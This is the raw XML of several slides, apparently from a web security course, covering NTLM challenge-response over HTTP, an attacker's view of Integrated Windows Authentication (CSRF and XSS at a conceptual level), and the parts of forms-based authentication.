            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69670" name="Line 58"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="4581525"/>
            <a:ext cx="0" cy="498475"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69671" name="Line 59"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="4581525"/>
            <a:ext cx="0" cy="498475"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69672" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="3827463"/>
            <a:ext cx="2530475" cy="1938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2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>This illustrates NTLMv1 auth … NTLMv2 is similar but much more complex</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69673" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="1295400"/>
            <a:ext cx="1828800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69674" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6400800" y="1828800"/>
            <a:ext cx="1828800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69675" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="2514600"/>
            <a:ext cx="1828800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69676" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="990600"/>
            <a:ext cx="13716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400" dirty="0"/>
              <a:t>Auth Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69677" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="1371600"/>
            <a:ext cx="1524000" cy="3810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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Challenge as part of a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>401 response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69678" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="2057400"/>
            <a:ext cx="1371600" cy="3810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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subsequent </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69679" name="Text Box 89"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8210550" y="2133600"/>
            <a:ext cx="781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800" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69680" name="Text Box 94"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5581650" y="2147888"/>
            <a:ext cx="7429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800" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69681" name="AutoShape 96"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="2057400" y="50800"/>
            <a:ext cx="304800" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="127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pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69682" name="Text Box 97"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="1422400"/>
            <a:ext cx="9906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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>16 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69683" name="Picture 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400" y="1219200"/>
            <a:ext cx="990600" cy="1830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9684" name="Picture 5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7200" y="1219200"/>
            <a:ext cx="990600" cy="1830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82880" y="182880"/>
            <a:ext cx="8763000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s Perspective of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Integrated Windows Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Focus on the client machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Always logged on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This authentication is perfect for Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>XSS is also more useful here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But not to steal cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>XSS can automate the CSRF attacks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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Forms-based Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1600200"/>
            <a:ext cx="5943600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most common in modern sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses HTML forms, integrated with normal web pages of application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very user-friendly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Initial authentication near beginning of session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For subsequent requests, some sort of session credential must be established</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Unless HTTPS is used, credentials are transported plain text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Back-end authentication is limited only by the developer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s imagination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically uses a database or LDAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client side code can also be part of the process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3699AC8-98E3-4A75-B886-3F11AB2EAAD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6027405" y="2009669"/>
            <a:ext cx="3074817" cy="2239481"/>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67640"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pieces of Forms-based Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="1600200"/>
            <a:ext cx="8001000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Forms-based logins are made of multiple pieces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>May be on a separate page or part of regular pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Processing code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Processing code can be either client or server side code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code can be part of the same page or a separate page on the server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Resources that require authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Commonly ignored by developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Testers should attempt to access the resources directly</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219075" y="137160"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Forms-based Authentication Illustrated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="4267200" y="3474720"/>
            <a:ext cx="1905000" cy="16764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marL="342900" indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73732" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="4343400" y="3855720"/>
            <a:ext cx="914400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Web Page with Form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73733" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="grayWhite">
          <a:xfrm>
            <a:off x="5029200" y="4465320"/>
            <a:ext cx="990600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00FF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Processing Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73734" name="Can 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="8001000" y="3931920"/>
            <a:ext cx="990600" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Auth DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
